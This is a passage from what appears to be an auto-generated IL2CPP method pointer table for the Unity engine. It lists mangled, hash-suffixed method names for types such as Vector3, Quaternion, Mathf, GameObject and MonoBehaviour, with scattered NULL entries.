Vector3_Angle_m1B9CC61B142C3A0E7EEB0559983CC391D1582F56,
Vector3_SignedAngle_mD30E71B2F64983C2C4D86F17E7023BAA84CE50BE,
Vector3_Distance_m99C722723EDD875852EF854AD7B7C4F8AC4F84AB,
Vector3_Magnitude_m6AD0BEBF88AAF98188A851E62D7A32CB5B7830EF,
Vector3_get_magnitude_mF0D6017E90B345F1F52D1CC564C640F1A847AF2D,
Vector3_SqrMagnitude_m04883F317B0C35E16E87523EBDFD346551290968,
Vector3_get_sqrMagnitude_m43C27DEC47C4811FB30AB474FF2131A963B66FC8,
Vector3_Min_m669DD6A6725D796639ADF4DE40E72AE8DCCFA9C7,
Vector3_Max_m8446E71C8778A1CE7C379BBF6966D15093C99145,
Vector3_get_zero_m9D7F7B580B5A276411267E96AA3425736D9BDC83,
Vector3_get_one_mE6A2D5C6578E94268024613B596BF09F990B1260,
Vector3_get_forward_mEBAB24D77FC02FC88ED880738C3B1D47C758B3EB,
Vector3_get_back_mBA6E23860A365E6F0F9A2AADC3D19E698687230A,
Vector3_get_up_mAB5269BFCBCB1BD241450C9BF2F156303D30E0C3,
Vector3_get_down_m19EB5B5B0EDFE9C272BD7BCC6923C4A9D616F771,
Vector3_get_left_mA75C525C1E78B5BB99E9B7A63EF68C731043FE18,
Vector3_get_right_m13B7C3EAA64DC921EC23346C56A5A597B5481FF5,
Vector3_op_Addition_m087D6F0EC60843D455F9F83D25FE42B2433AAD1D,
Vector3_op_Subtraction_m1690F44F6DC92B770A940B6CF8AE0535625A9824,
Vector3_op_UnaryNegation_m3AC523A7BED6E843165BDF598690F0560D8CAA63,
Vector3_op_Multiply_m516FE285F5342F922C6EB3FCB33197E9017FF484,
Vector3_op_Multiply_m29F4414A9D30B7C0CD8455C4B2F049E8CCF66745,
Vector3_op_Division_mD7200D6D432BAFC4135C5B17A0B0A812203B0270,
Vector3_op_Equality_m15951D1B53E3BE36C9D265E229090020FBD72EBB,
Vector3_op_Inequality_m6A7FB1C9E9DE194708997BFA24C6E238D92D908E,
Vector3_ToString_m6C24B9F0382D25D75B05C606E127CD14660574EE,
Vector3_ToString_m3185BD544ED9BA81E88936544EC298C19207BDF1,
Vector3_ToString_mA8DA39B6324392BB93203A4D4CB85AF87231CB62,
Vector3__cctor_mDE5FA92524AC1AFCC13E3C81C93DB4F05B08B699,
Vector3_Slerp_Injected_mA7290E9A78BC8320063819903A15141FFD6395DC,
Quaternion_FromToRotation_m041093DBB23CB3641118310881D6B7746E3B8418,
Quaternion_Inverse_m7597DECDAD37194FAC86D1A11DCE3F0C7747F817,
Quaternion_Slerp_m5FDA8C178E7EB209B43845F73263AFE9C02F3949,
Quaternion_SlerpUnclamped_mB38920352A1B11369D782F78E183568CAFA82C0F,
Quaternion_Internal_FromEulerRad_m2842B9FFB31CDC0F80B7C2172E22831D11D91E93,
Quaternion_Internal_ToEulerRad_m9B2C77284AEE6F2C43B6C42F1F888FB4FC904462,
Quaternion_AngleAxis_m01A869DC10F976FAF493B66F15D6D6977BB61DA8,
Quaternion_LookRotation_mE6859FEBE85BC0AE72A14159988151FF69BF4401,
Quaternion__ctor_m868FD60AA65DD5A8AC0C5DEB0608381A8D85FCD8,
Quaternion_get_identity_mB9CAEEB21BC81352CBF32DB9664BFC06FA7EA27B,
Quaternion_op_Multiply_m5AC8B39C55015059BDD09122E04E47D4BFAB2276,
Quaternion_op_Multiply_mF1348668A6CCD46FBFF98D39182F89358ED74AC0,
Quaternion_IsEqualUsingDot_m5C6AC5F5C56B27C25DDF612BEEF40F28CA44CA31,
Quaternion_op_Equality_m3DF1D708D3A0AFB11EACF42A9C068EF6DC508FBB,
Quaternion_op_Inequality_mC1922F160B14F6F404E46FFCC10B282D913BE354,
Quaternion_Dot_m4A80D03D7B7DEC054E2175E53D072675649C6713,
Quaternion_Angle_m445E005E6F9211283EEA3F0BD4FF2DC20FE3640A,
Quaternion_Internal_MakePositive_m864320DA2D027C186C95B2A5BC2C66B0EB4A6C11,
Quaternion_get_eulerAngles_m2DB5158B5C3A71FD60FC8A6EE43D3AAA1CFED122,
Quaternion_Euler_mD4601D966F1F58F3FCA01B3FC19A12D0AD0396DD,
Quaternion_Euler_m66E346161C9778DF8486DB4FE823D8F81A54AF1D,
Quaternion_Normalize_m63D60A4A9F97145AF0C7E2A4C044EBF17EF7CBC3,
Quaternion_get_normalized_m08AB963B13A0EC6F540A29886C5ACFCCCC0A6D16,
Quaternion_GetHashCode_m5F55C34C98E437376595E722BE4EB8A70434F049,
Quaternion_Equals_mCF93B00BA4FCDDE6100918451343DB9A0583A0A0,
Quaternion_Equals_m25B95D8412B79CC7F8B34062BFAE662BD99578BE,
Quaternion_ToString_mC5BD5DEF60FCA4A38924462A5C4440ECFCF934C4,
Quaternion_ToString_m57FD902CB5D5FDE30866C169033515B5330B3C5F,
Quaternion_ToString_m9B592D577B3FDB892CA53ABF3457BC2EDE45DF8C,
Quaternion__cctor_m0629AD915FB4AD74CBEE6788AA66DE91DBA2F8CB,
Quaternion_FromToRotation_Injected_mEBE4E345974422E4906C862737C306068D68EFB1,
Quaternion_Inverse_Injected_m6364007A516BE22DCDDE7006E7FF2766D9E548B6,
Quaternion_Slerp_Injected_m891D113D3FA964775E4259A784550F15BB78323B,
Quaternion_SlerpUnclamped_Injected_m0E2ECFB4264ED7FF75C648875E173FC2046CA74B,
Quaternion_Internal_FromEulerRad_Injected_m175442AFC6D3B1E8B147793ACC2972D539224E77,
Quaternion_Internal_ToEulerRad_Injected_m0A3D3DD2F0AF96455C082454169BF0CE21A60D06,
Quaternion_AngleAxis_Injected_m51E6538E88B6835838D157A2330346C520E414CB,
Quaternion_LookRotation_Injected_m5F814D23AEC43855A5B7D6792B5EE9637BA8CB19,
Mathf_IsPowerOfTwo_m76CE14ADD2BB5CF0E0E28F61826F19A7CAA015A3,
Mathf_NextPowerOfTwo_m25B17CBCFB02762842BE3725618DD97C7C4B1014,
Mathf_GammaToLinearSpace_m4D758883DC92707BEB3D1774CE252B0233309DA6,
Mathf_PerlinNoise_mFDD2B12BE1FE4E890FA9FCD5CE6D7A90CAA779D4,
Mathf_Sin_mDF1599028ED099FD561435ECA5D855D497D68522,
Mathf_Cos_m98106088477B4D2F109126476606618645FE0B4A,
Mathf_Tan_mDA8A8AB9E7C34A9F71E665288DC91C02C6375974,
Mathf_Asin_mDB2B35EA988E8046B5DA225324D51AC54949DEB6,
Mathf_Acos_m31E645B707B2852DB9FACCD86126E3E72A344E28,
Mathf_Atan_mDF176C41BF5DB5837E937F994806E9BC66B44546,
Mathf_Atan2_m175B2856E832846B20DD2449F8A7FD56DFEC400E,
Mathf_Sqrt_m3D6D010C2068F41874DAFCE488FFB775761B54D0,
Mathf_Abs_m3AB6ECAEF6C7FD03453C7A984B211EC9CBF99DEC,
Mathf_Abs_mEF48B2D15BEC6663A575693F563C6DC42C8135AE,
Mathf_Min_m4F2A9C5128DC3F9E84865EE7ADA8DB5DA6B8B507,
Mathf_Min_mFEAD72DF4C4708B86BF464AB4F5F1468FAD8E784,
Mathf_Max_mA9DCA91E87D6D27034F56ABA52606A9090406016,
Mathf_Max_m8A4C189A6749DFE3ED8B66D9D3CACD8DB333974F,
Mathf_Pow_mA5253A5538FD900DFD781D297AC03A8E31561B03,
Mathf_Exp_m482F5D6CA3A7CFDD7FBACC95F9FE8A14310C61F2,
Mathf_Log_m5AD7CD5F4DCE823F0D89CFFD817934769D73B2B7,
Mathf_Log_mC3436829A9ABA67272768EF5B1B6A94C1B41C804,
Mathf_Log10_mB0962ABE003B6F3C32D9F85F3F97D88D9A50E740,
Mathf_Ceil_m2DD86C044E7CB46729630CD3C254EEBE4D3E0244,
Mathf_Floor_mFA10ED57F5D0C1E05F25868C8E99CE41D7C1A742,
Mathf_Round_m2B4D74636DB0368F222D9BD6079343E1AFB3765D,
Mathf_CeilToInt_m04999E3DEB696135EFD620A30F51503D700C1998,
Mathf_FloorToInt_mD086E41305DD8350180AD677833A22733B4789A9,
Mathf_RoundToInt_m6A6E30BA4157D69DA47F02B43108882DDD7C4A70,
Mathf_Sign_m015249B312238B8DCA3493489FAFC3055E2FFEF8,
Mathf_Clamp_m154E404AF275A3B2EC99ECAA3879B4CB9F0606DC,
Mathf_Clamp_mA48718D9A20D8972EDD41714CEF6BBF864F442EA,
Mathf_Clamp01_mD921B23F47F5347996C56DC789D1DE16EE27D9B1,
Mathf_Lerp_mFB4910B358B986AFB22114ED90458E8341867479,
Mathf_LerpUnclamped_mF5A9A9AC62D7BAD992CEAB2E5B6A49F5D2B87700,
Mathf_LerpAngle_m1ED3F488EFE973020124E59B6B6D439D9ACCFA42,
Mathf_Approximately_m1C8DD0BB6A2D22A7DCF09AD7F8EE9ABD12D3F620,
Mathf_SmoothDamp_m00E482452BCED3FE0F16B4033B2B5323C7E30829,
Mathf_Repeat_m1ACDE7EF466FB6CCAD29B3866E4A239A8530E9D5,
Mathf_InverseLerp_m4E1DA076090EC56955724109B3EE12AA07548016,
Mathf_DeltaAngle_m4B87B84265A48389AC3F5E3E8164570C6AECE5C3,
Mathf__cctor_m2665985B855565B66529F63DA1E16CD47E22DB0E,
Vector2_get_Item_m18BC65BB0512B16A1F9C8BE4B83A3E7BBAD7064D,
Vector2_set_Item_mEF309880B9B3B370B542AABEB32256EEC589DD03,
Vector2__ctor_m9525B79969AFFE3254B303A40997A56DEEB6F548,
Vector2_Lerp_mF3BD6827807680A529E800FD027734D40A3597E1,
Vector2_LerpUnclamped_mEC8F3EB7A6AA1B9C494701C993EA274838930F5A,
Vector2_Scale_mC9AFC562DF393640663C6FFC733EADD343FB6B65,
Vector2_Normalize_m56DABCAB5967DF37A6B96710477D3660D800C652,
Vector2_get_normalized_mF6722883AEFB5027690A778DF8ACC20F0FA65297,
Vector2_ToString_mB47B29ECB21FA3A4ACEABEFA18077A5A6BBCCB27,
Vector2_ToString_m5F3C7B1C542DAF4CE90DDAB02A633AB0A3B08A05,
Vector2_ToString_mC10F098442E56919947154402A77EDE28DC9B7BE,
Vector2_GetHashCode_mED8670C0E122B7ED0DAB4C3381ADFF04B75E0B03,
Vector2_Equals_mA4E81D6FCE503DBD502BA499708344410F60DA4E,
Vector2_Equals_mDF84D5ED14E018609C6A9C9BAE016C1B33BCFF4C,
Vector2_Dot_mBF0FA0B529C821F4733DDC3AD366B07CD27625F4,
Vector2_get_magnitude_m5C59B4056420AEFDB291AD0914A3F675330A75CE,
Vector2_get_sqrMagnitude_mA16336720C14EEF8BA9B55AE33B98C9EE2082BDC,
Vector2_Angle_m9668B13074D1664DD192669C14B3A8FC01676299,
Vector2_Distance_m220B2ADBE9F87426BEEE291263560DFE78F835B5,
Vector2_SqrMagnitude_m9020166A171C031DA7B163D3261C09EB7090F0AF,
Vector2_Min_mAB64CD54A495856162FC5753B6C6B572AA4BEA1D,
Vector2_Max_m5FF3A49170F857E422CDD32A51CABEAE568E8088,
Vector2_op_Addition_m704B5B98EAFE885978381E21B7F89D9DF83C2A60,
Vector2_op_Subtraction_m664419831773D5BBF06D9DE4E515F6409B2F92B8,
Vector2_op_Multiply_m6158066AFB36810D63D98EABF0FABEFFC647B2A0,
Vector2_op_Division_mB1CA903ACF933DB0BE2016D105BB2B4702CF1004,
Vector2_op_UnaryNegation_m47556D28F72B018AC4D5160710C83A805F10A783,
Vector2_op_Multiply_m4EEB2FF3F4830390A53CE9B6076FB31801D65EED,
Vector2_op_Multiply_mB3B310D2D0CAE78AFB2AE6A9FD2902DE4B359211,
Vector2_op_Division_m69F64D545E3C023BE9927397572349A569141EBA,
Vector2_op_Equality_m5447BF12C18339431AB8AF02FA463C543D88D463,
Vector2_op_Inequality_mCF3935E28AC7B30B279F07F9321CC56718E1311A,
Vector2_op_Implicit_m8F73B300CB4E6F9B4EB5FB6130363D76CEAA230B,
Vector2_op_Implicit_mCD214B04BC52AED3C89C3BEF664B6247E5F8954A,
Vector2_get_zero_m009B92B5D35AB02BD1610C2E1ACCE7C9CF964A6E,
Vector2_get_one_m232E885D3C7BB6A96D5FEF4494709BA170447604,
Vector2_get_up_mF4D6DB00DEA7D055940165B85FFE1CEF6F7CD3AA,
Vector2_get_down_m744DCF40A3F17B76B9C084145D6E66AC0DE3D5CD,
Vector2_get_right_mCE2D0142663361ED4B48C36873786986D25A6E0A,
Vector2_get_positiveInfinity_m03B87ABC38ACBE2160599734C319DD1BA1064B5F,
Vector2__cctor_m36CE8EBCD8DDF8D15B8AD39C675A117DC338510A,
Vector2Int_get_x_mA2CACB1B6E6B5AD0CCC32B2CD2EDCE3ECEB50576,
Vector2Int_set_x_m291ECF246536852F0B8EE049C4A3768E4999CDC8,
Vector2Int_get_y_m48454163ECF0B463FB5A16A0C4FC4B14DB0768B3,
Vector2Int_set_y_mF81881204EEE272BA409728C7EBFDE3A979DDF6A,
Vector2Int__ctor_mC20D1312133EB8CB63EC11067088B043660F11CE,
Vector2Int_op_Implicit_m0D3B1D66E99D4C636F431691169479582058BED3,
Vector2Int_op_Equality_m0BACF220C29A50100740A626E2A928F9F96E6759,
Vector2Int_Equals_m6D91EFAA6B3254334436BD262A4547EA08281BA3,
Vector2Int_Equals_m32811BA0576C096D5EB5C0CFD8231478F17229A6,
Vector2Int_GetHashCode_mA3B6135FA770AF0C171319B50D9B913657230EB7,
Vector2Int_ToString_m6F7E9B9B45A473FED501EB8B8B25BA1FE26DD5D4,
Vector2Int_ToString_m44BA6941AEF41076A39848B95DDEFEA88A094B5E,
Vector2Int__cctor_mBDFABDF36D93E0928973998555369F69ED7D165B,
Vector4_get_Item_mB1D001A235857569E479FB799EF77C52391D19EF,
Vector4_set_Item_mF24782F861A16BB0436C2262FA916B4EE69998A6,
Vector4__ctor_m96B2CD8B862B271F513AF0BDC2EABD58E4DBC813,
Vector4_Lerp_m6503F684342826D70038B2D13DEE7BD56EC1C88C,
Vector4_GetHashCode_m53F6FCA56A0051C9D1AB41AA3EAA2C86CDAA8B92,
Vector4_Equals_mC2596CA0F441D25DE7A9419BE66A8FA2DA355CB9,
Vector4_Equals_m73FAA65A1A565EE28D6C9385603829894B7D4392,
Vector4_Normalize_m8F4DF140B072B7EC3D03F05AC1EDFB270579A8D2,
Vector4_get_normalized_mD7671F6DCE4C1A80243139B87858FF65F4B865A3,
Vector4_Dot_m77027F378A20620C9F2AC80A06191C412B76FD2E,
Vector4_Magnitude_mCCDF8803AFB8B4B52D259376C9CD49F065FF0F42,
Vector4_get_magnitude_m97A83FC484190F07D8017F4BD10E3C81478E0D20,
Vector4_get_sqrMagnitude_m864A2908BCF9E060BA73DE3DD259EC06F47F913C,
Vector4_get_zero_m51B18794FAF141EBD06CA9907E6F7DF9D60F3515,
Vector4_get_one_m141F5123C4052CC703B41E5892A4AC26C59D36EE,
Vector4_op_Addition_m5E7015CDA7DD1FCB4E488DE23C5DB959D7406843,
Vector4_op_Multiply_m10DA1FA6A405C8988C46FFD159ED9FF9E5D732F5,
Vector4_op_Division_mBBF62E1EDEB882858589FCF7280591FD11CD660C,
Vector4_op_Equality_m80E2AA0626A70EF9DCC4F4C215F674A22D6DE937,
Vector4_op_Inequality_m23600308603A706A9DD6057603DEA82E9A6F9FEF,
Vector4_op_Implicit_mB05287DC52FC87A756AB80E837E1EC22FEEB3937,
Vector4_op_Implicit_m2EC16C74D768EEAA9BBC40DA11337F912014FC57,
Vector4_op_Implicit_m6162D8136CFE97A5A8BD3B764F9074DB96AA5CD0,
Vector4_ToString_mFA0DDF34C1E394F75EF65E06764A1BE750E7F388,
Vector4_ToString_m2BE67BEBBD3059C9CEE29BF34AD30E1D7057E914,
Vector4__cctor_m901E65EFB13CFC002E6DF21A8071FB7C7008CCC4,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_SendMessage_m561CA89041EBAFF52314B0D35F7335AF03690EE2,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_TrySendMessage_mD5B897823668810AC92B7A4DB37D2AC469B5AD92,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_Poll_m81154E92307248D79B91A1C1EA75BEF458573D02,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_RegisterInternal_m75ADFE89F806D7CCDA39F4BEB6E13F98789EC3A4,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_UnregisterInternal_m52F310CFE97694C751D5B1FEC47D42C544CB221B,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_Initialize_m2DF230DCAD67005FD0517D836520E73944A6CF71,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_IsConnected_m6C83428E73F46078BA1407A17A69702BC8F34956,
PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_DisconnectAll_m6143241C82774D473C8979A05BE0CE3ADAF37F98,
PlayerConnectionInternal_IsConnected_mC70EEB4A36D9B1ECF154FE2CB74370E24E0053A1,
PlayerConnectionInternal_Initialize_m6C024134BBFE135A15CDD4BADF7FDF21D21D3171,
PlayerConnectionInternal_RegisterInternal_mAEDF69DF2114104B7BCBD5DC995C156D18BC334F,
PlayerConnectionInternal_UnregisterInternal_mB9CC98CAC75430D329D191A9FBB5BD1930AF5C35,
PlayerConnectionInternal_SendMessage_m023CC363EF369965FAD8ECC0E17D1219CE4FED23,
PlayerConnectionInternal_TrySendMessage_m624CB64545D94A3CA26D1B7724CEF0A4DE62AC52,
PlayerConnectionInternal_PollInternal_m1BFF0824FA228EACA54B25A5ED6C118D3B45E0AC,
PlayerConnectionInternal_DisconnectAll_m829AFC50AB1C38E8B429FBD35DA082D1D21524F8,
PlayerConnectionInternal__ctor_m522FC54B8DAAD52F95A07B1CA9E5AF0E36B13F45,
PropertyAttribute__ctor_m19247686E165101F140615C7306DC2DA3953D97D,
TooltipAttribute__ctor_m9DA2380A6739B9D40E142C81E691BEBC7A79116F,
SpaceAttribute__ctor_mD1981FDED1C938017DBD5557E292408BC8F2618E,
SpaceAttribute__ctor_mAA6E6B2811F7585F504FB0C06D52ABF82F560290,
HeaderAttribute__ctor_mE368967744CF600B4A18E361E903FB0B010A8DC9,
RangeAttribute__ctor_mFB67BD2663AD5B0D79F5E2D7E494FA8FCB21C6FF,
MultilineAttribute__ctor_m5BAEA5EB5EB078477AC5007100DE70EC06F95BBE,
TextAreaAttribute__ctor_m5FEE25A73C001A99BC7A86895A0B88CF64FD6FA4,
PropertyNameUtils_PropertyNameFromString_m92870CD45E98808512BBBD986BA17B7F57AE52EC,
PropertyNameUtils_PropertyNameFromString_Injected_m312B2B22255E4A1D9040E9D71BC9115DF7CFCA0D,
PropertyName__ctor_mFA341118B63F88B69464A6F1DF248B569686D778,
PropertyName__ctor_m9F28B1DA9CEDDEAA6663C795456B9F5E95CAE92F,
PropertyName_IsNullOrEmpty_mFDF7EE642D43C06868265B85E47663A1F071ECCB,
PropertyName_op_Equality_mAEF78F551790B70DB41986B10E1E6A85A41C53C0,
PropertyName_GetHashCode_m7D4B878BA78625CDD78C9B045B5EADFDBF94C378,
PropertyName_Equals_mFD87005C352B7BEB4279560B1A489409B0692143,
PropertyName_Equals_m7D00F3B148E65210A82101C31F1F217C9527113E,
PropertyName_op_Implicit_m8DD1EAEDC08A63ADB4A72C882329D68B54973DE9,
PropertyName_ToString_mDE271855F7B9A516185A66E12D90FE6B6C9DF6C0,
Random_Range_mF26F26EB446B76823B4815C91FA0907B484DF02B,
Random_Range_mD4D2DEE3D2E75D07740C9A6F93B3088B03BBB8F8,
Random_RandomRangeInt_m198D6544B168F5302968DA1E7B32CB4DA4FFD9FA,
Random_get_value_m87344B352E686178D743B14C468EEE01757E9D43,
ResourcesAPIInternal_FindShaderByName_mCBB9F02459FC2130B49E25FC9285D4339A929D41,
ResourcesAPIInternal_Load_m81B21CF82B21A433CE8F6B9F74647BA701B9A97D,
ResourcesAPI_get_ActiveAPI_m5DE396B611C59182A60EB84C0A559FDDA88036E2,
ResourcesAPI_get_overrideAPI_m3600AF874DC2A30ED0997DBC163942AF852ED3DF,
ResourcesAPI__ctor_m27A1A0B35DF74437840934A70F47DE1BAEAFECA0,
ResourcesAPI_FindShaderByName_m9A6287AA24EC06DBF3B2630618015B5CB6F01315,
ResourcesAPI_Load_m54EE8C7AFD4B386B751AFC8C161B62CB2C983844,
ResourcesAPI__cctor_m1376AFDA715987983B47797963B8D24ED5BC461B,
NULL,
NULL,
Resources_Load_mDCC8EBD3196F1CE1B86E74416AD90CF86320C401,
Resources_GetBuiltinResource_m8761B94EA68B13EC714994F6536B356A1AEF4538,
NULL,
AsyncOperation_InternalDestroy_mDB8F76E255DA6FADBA239E4D352FAE6DAEE8F699,
AsyncOperation_Finalize_m8163934A18D3DAD2BF51272AAA35EAB1C7BBDE7D,
AsyncOperation_InvokeCompletionEvent_m477EBEDE3FE8992BDC1DBFE02A313193CDA46DD4,
AsyncOperation__ctor_m53CF89405A1E2DA6F517D05792826F5784B0D6EC,
AttributeHelperEngine_GetParentTypeDisallowingMultipleInclusion_m3E3F8CF6E0EEC531DA2BF637BBE8BDAEA2C8231D,
AttributeHelperEngine_GetRequiredComponents_mC97CB5C0627F0F681AC04F4913038FF67DCE65A3,
AttributeHelperEngine_GetExecuteMode_mBA3F224C08D5182797395CB6AA0EB1C4E37B99C8,
AttributeHelperEngine_CheckIsEditorScript_m9D5FA968C3AB0F4C16CF820FBA366E575A448763,
AttributeHelperEngine_GetDefaultExecutionOrderFor_mB731EF2FA066172162193F49B7E73301AD6DD1A1,
NULL,
AttributeHelperEngine__cctor_m87D49D12A1BE7FA0561A45399C74D06170ED7F0B,
DisallowMultipleComponent__ctor_mCED73439170619124E9FE0303137D0A7130C03B2,
RequireComponent__ctor_mB1C4FD7EA20C0ADA84C7956B948A96856B2465A9,
AddComponentMenu__ctor_m0C9845C59ED5CB4BEDB86EBD14EC574E13240C1B,
AddComponentMenu__ctor_mFC3F5A41F4F41587531E9352DEC243EE49A01C25,
CreateAssetMenuAttribute_set_menuName_m2D51E6DFEB3D5F310A643D965304CEDD85A8FCCA,
CreateAssetMenuAttribute_set_fileName_mBE339C0FE5593AA2C0EE52E61AE2C3A2F1771496,
CreateAssetMenuAttribute_set_order_mCD6648DA2E94E0C9C1F462F9F00F71E4B2953AAA,
CreateAssetMenuAttribute__ctor_mE29F1B8C4AD3F80E740FFF5624A4BDB366FCB151,
ContextMenu__ctor_mCD05AD13A40676709620DD7D4A1A8DC787CE1351,
ContextMenu__ctor_m963C5D6E8ECB19D41754EF3626E0707EC6812D02,
ContextMenu__ctor_m22CF01682EFB1927001E394DC4F378E4F6E131CF,
ExecuteInEditMode__ctor_mAA44FC0120898DDA33D063EF3692B7F0F22AD792,
ExecuteAlways__ctor_m2792EFBEBCECA35F3C1EB12B3BE9290B734C4A46,
HideInInspector__ctor_m6F39BCE00C935AB46163661E9D4B0B6A6B7976DE,
HelpURLAttribute__ctor_m4671D9179DCF032E9F769A70A1665B1B60B233A7,
DefaultExecutionOrder__ctor_mD02339C868E98633AB5836930A963A506CCC9D1D,
DefaultExecutionOrder_get_order_m362E5F2AB40AAA5154301F88DE93B80F865A31AF,
ExcludeFromPresetAttribute__ctor_m6BBE5C9A0F32E56C97AE0A9A6FB66CC7DDC8C93A,
Behaviour_get_enabled_mAAC9F15E9EBF552217A5AE2681589CC0BFA300C1,
Behaviour_set_enabled_mF1DCFE60EB09E0529FE9476CA804A3AA2D72B16A,
Behaviour_get_isActiveAndEnabled_mEB4ECCE9761A7016BC619557CEFEA1A30D3BF28A,
Behaviour__ctor_m00422B6EFEA829BCB116D715E74F1EAD2CB6F4F8,
ClassLibraryInitializer_Init_m2D841B7BCF4CCDEB6D38D3956B1D8E8051F2CF5C,
Component_get_transform_m2919A1D81931E6932C7F06D4C2F0AB8DDA9A5371,
Component_get_gameObject_m57AEFBB14DB39EC476F740BA000E170355DE691B,
Component_GetComponent_m4352437B839B9601EB007CAC1007C8E1FB8A427D,
Component_GetComponentFastPath_mE4FD8E93F76B2C79314274295DBB74B0FC250EA0,
NULL,
NULL,
Component_GetComponentInChildren_m4050899166730E8F6629B895597CF4ECC894B597,
NULL,
NULL,
NULL,
NULL,
NULL,
Component_GetComponentInParent_mA402B7F87D23E039BB045630E5EA3AC020D8A7C2,
NULL,
NULL,
NULL,
NULL,
Component_GetComponents_m683496B86CDC639A81EC67D834317926B371FAE1,
Component_GetComponentsForListInternal_m7B3A61AF88E5E6F845817EC28E22FD39944EFBC7,
Component_GetComponents_mFD04B9CB0BD37505417054D614436B5844DC4365,
NULL,
Component_get_tag_m7561A81116CAB82B8A459E934662BFC2039FB7EF,
NULL,
Component_CompareTag_mE6F8897E84F12DF12D302FFC4D58204D51096FC5,
Component__ctor_m4319162A6E6B02301078C1233F6E7F4A3E735486,
Coroutine__ctor_m65324E0C6062163C0378CD4190E903B4C2ED75DD,
Coroutine_Finalize_m83673D20AB464E4C866408F798D5CA1F0391808D,
Coroutine_ReleaseCoroutine_m0B7D5B0B89BB1B66D633A83ECD565121A0921FA4,
SetupCoroutine_InvokeMoveNext_m4C8B79D8A35F69EEECAA16C82793525E74D75CE9,
SetupCoroutine_InvokeMember_m6E51A48B37F103235272E6DAE80C5AE88F10A5EE,
NULL,
CustomYieldInstruction_get_Current_m6F1287B6C4A16C875913A556D66ACB1BF599E6AF,
CustomYieldInstruction_MoveNext_m875CC6944F46765EB3BE14306E83E7C54CBEB2CF,
CustomYieldInstruction_Reset_mA357794CF2260A3E48748612BDE01CB0B7CF8A8D,
CustomYieldInstruction__ctor_mB64531EC09E871EF60BFAC16918A774C977C7B50,
ExcludeFromObjectFactoryAttribute__ctor_m547CE65CC098EB4466C456476ECF2D78E2834FBB,
ExtensionOfNativeClassAttribute__ctor_m64B864DD565CE1BF04DA861E6759163A1727F6A1,
GameObject_CreatePrimitive_mE2F848626FE928B6E3810ABFB81867E619BB2507,
NULL,
GameObject_GetComponent_m99E12753EA84947521DC711CA33F452B5E65B474,
GameObject_GetComponentFastPath_mF0B51884C05EE32D44B55E8511D7FCD977918058,
GameObject_GetComponentInChildren_m4A3692D1D93C726D5B02E588130C782A336961D5,
NULL,
NULL,
GameObject_GetComponentInParent_m80F84FC4D405C1F9987C0E77385749814AD0027C,
NULL,
NULL,
GameObject_GetComponentsInternal_m5D5FD903F9CB151AC9782E5840D397F422A82F95,
GameObject_GetComponents_m967DC44523FB7DB85C2D2433B1E53AB24BD551B2,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
GameObject_TryGetComponentFastPath_m1F071538D2B2D1C943BE663CE8AEED6C1DEEEE27,
GameObject_Internal_AddComponentWithType_m2D986297A2133DD6896D9715F22C9627991D07FF,
GameObject_AddComponent_mDF246771EC34613FA6AF0C98D443368FB43E9F36,
NULL,
GameObject_get_transform_m0BC10ADFA1632166AE5544BDF9038A2650C2AE56,
GameObject_get_layer_m108902B9C89E9F837CE06B9942AA42307450FEAF,
GameObject_set_layer_m6E1AF478A2CC86BD222B96317BEB78B7D89B18D0,
GameObject_SetActive_m638E92E1E75E519E5B24CF150B08CA8E0CDFAB92,
GameObject_get_activeSelf_m4F3E5240E138B66AAA080EA30759A3D0517DA368,
GameObject_get_activeInHierarchy_m49250F4F168DCC5388D5BE4F6A5681386907B109,
GameObject_set_isStatic_m0468F0E4553F5B3DDBE03F3788BE0A1A3736839C,
GameObject_get_tag_mEDD27BF795072834D656B286CBE51B2C99747805,
GameObject_CompareTag_m6378BE50D009A93D46036F74CC3F7E2ECB0636E5,
GameObject_FindGameObjectsWithTag_m63AB9863553265F03EDE4C11AEA98AF591CAEA1E,
GameObject_SendMessage_m452B3418BE240EC79550C15E1F2EAE61488F06DF,
GameObject_BroadcastMessage_m9ECE0B5D046E272E160714135F1C9D222F875AE7,
GameObject_BroadcastMessage_mB51BBADA9206219343B0E7C4199F75BAFEF19A78,
GameObject__ctor_m37D512B05D292F954792225E6C6EEE95293A9B88,
GameObject__ctor_m7D0340DE160786E6EFA8DABD39EC3B694DA30AAD,
GameObject__ctor_m721D643351E55308EA4F5F41B67D5446D11C61F0,
GameObject_Internal_CreateGameObject_mFABE4AB825D9A336A69BD2C45F0506DFEC9F62F9,
GameObject_Find_mFF1D6C65A7E2CD82443F4DCE4C53472FB30B7F51,
LayerMask_op_Implicit_m5D697E103A7CB05CADCED9F90FD4F6BAE955E763,
LayerMask_op_Implicit_mDC9C22C4477684D460FCF25B1BFE6B54419FB922,
LayerMask_get_value_m70CBE32210A1F0FD4ECB850285DA90ED57B87974,
LayerMask_NameToLayer_mEA9343DFAF52541409F557BBB4FAC0E92E2FBF6B,
ManagedStreamHelpers_ValidateLoadFromStream_m4D3540AC5E72B77BBC197B5C9C2C9AD85EF8E215,
ManagedStreamHelpers_ManagedStreamRead_m16D4326A97D7C8D8D12F11AF9CCEB78CBB574DD8,
ManagedStreamHelpers_ManagedStreamSeek_m49FE73EE67BFC6EB9F57B31BC8E8D4D3DC84025C,
ManagedStreamHelpers_ManagedStreamLength_m41B99C70D4CA92BEF242D2EE9EB71AB95E3AD48F,
MonoBehaviour_IsInvoking_mF7CF0A2ABF31B61FC67A75E9210C16683E5020A0,
MonoBehaviour_CancelInvoke_m177BCBDFCEA3E09C02E3E444BF4FBA648FAE3CFA,
MonoBehaviour_Invoke_mF724350C59362B0F1BFE26383209A274A29A63FB,
MonoBehaviour_InvokeRepeating_mF208501E0E4918F9168BBBA5FC50D8F80D01514D,
MonoBehaviour_CancelInvoke_m268FFD58AFF64C07FD4C9B9B8B85F58BD86F3A01,
MonoBehaviour_IsInvoking_m9CD08C2F7F5E83660FFE3B5A373B202CCBDB3708,
